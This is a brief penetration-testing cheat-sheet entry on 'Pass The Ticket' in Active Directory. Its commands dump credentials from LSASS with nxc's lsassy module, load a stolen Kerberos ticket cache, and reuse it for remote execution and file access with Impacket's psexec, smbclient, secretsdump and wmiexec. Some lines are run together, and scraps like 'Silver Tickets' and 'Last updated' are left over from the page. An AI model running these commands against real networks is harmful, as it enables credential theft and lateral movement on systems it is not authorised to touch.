Pass The Ticket
nxc smb <IP> -u <USER> -p <PASS> -M lsassychmod 600 <USER>.ccache
export KRB5CCNAME=<USER>.ccache
klistnxc smb <IP_TARGET> --use-kcache --kdcHost <HOSTNAME_DC>
psexec.py -k -no-pass -dc-ip <DC_IP> [-target-ip <IP_TARGET>] <HOSTNAME_TARGET> # TGT
impacket-smbclient -k -no-pass -dc-ip <DC_IP> <HOSTNAME> # TGS CIFS
# also with impacket-secretsdump, impacket-wmiexec, etc.SPN service
Service Type
Service Silver Tickets
Last updated